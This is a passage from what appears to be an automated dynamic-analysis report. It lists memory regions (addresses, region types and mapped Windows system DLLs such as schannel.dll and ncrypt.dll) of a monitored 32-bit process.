	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2071
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2072
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2073
	        start_va = 0x3140000
	          end_va = 0x3140fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003140000"
	        filename = ""

Region:
	              id = 2074
	        start_va = 0x77310000
	          end_va = 0x77393fff
	     entry_point = 0x77310000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2075
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2076
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2077
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2078
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2079
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2080
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2081
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2082
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2083
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2084
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2085
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2086
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2087
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2088
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2089
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2090
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2091
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2092
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2093
	        start_va = 0x4de0000
	          end_va = 0x4e1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004de0000"
	        filename = ""

Region:
	              id = 2094
	        start_va = 0x4e20000
	          end_va = 0x4f1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004e20000"
	        filename = ""

Region:
	              id = 2095
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2096
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2097
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2098
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2099
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2100
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2101
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2102
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2103
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2104
	        start_va = 0x71cd0000
	          end_va = 0x71d16fff
	     entry_point = 0x71cd0000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")

Region:
	              id = 2105
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2106
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2107
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2108
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2109
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2110
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2111
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2112
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2113
	        start_va = 0x71d20000
	          end_va = 0x71d27fff
	     entry_point = 0x71d20000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")

Region:
	              id = 2114
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2115
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2116
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2117
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2118
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2119
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2120
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2121
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2122
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2123
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2124
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2125
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2126
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2127
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2128
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2129
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2130
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2131
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2132
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2133
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2134
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2135
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2136
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2137
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2138
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2139
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2140
	        start_va = 0x70120000
	          end_va = 0x70183fff
	     entry_point = 0x70120000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")

Region:
	              id = 2141
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2142
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2143
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2144
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2145
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2146
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2147
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2148
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2149
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2150
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2151
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2152
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2153
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2154
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2155
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2156
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2157
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2158
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2159
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2160
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2161
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2162
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2163
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2164
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2165
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2166
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2167
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2168
	        start_va = 0x33d0000
	          end_va = 0x33d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2169
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2170
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2171
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2172
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2173
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2174
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2175
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2176
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2177
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2178
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2179
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2180
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2181
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2182
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2183
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2184
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2185
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2186
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2187
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2188
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2189
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2190
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2191
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2192
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2193
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2194
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2195
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2196
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2197
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2198
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2199
	        start_va = 0x33e0000
	          end_va = 0x33fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033e0000"
	        filename = ""

Region:
	              id = 2200
	        start_va = 0x700c0000
	          end_va = 0x700ebfff
	     entry_point = 0x700c0000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")

Region:
	              id = 2201
	        start_va = 0x700f0000
	          end_va = 0x7010ffff
	     entry_point = 0x700f0000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")

Region:
	              id = 2202
	        start_va = 0x70110000
	          end_va = 0x7011ffff
	     entry_point = 0x70110000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")

Region:
	              id = 2203
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2204
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2205
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2206
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2207
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2208
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2209
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2210
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2211
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2212
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2213
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2214
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2215
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2216
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2217
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2218
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2219
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2220
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2221
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2222
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2223
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2224
	        start_va = 0x33d0000
	          end_va = 0x33effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000033d0000"
	        filename = ""

Region:
	              id = 2225
	        start_va = 0x33d0000
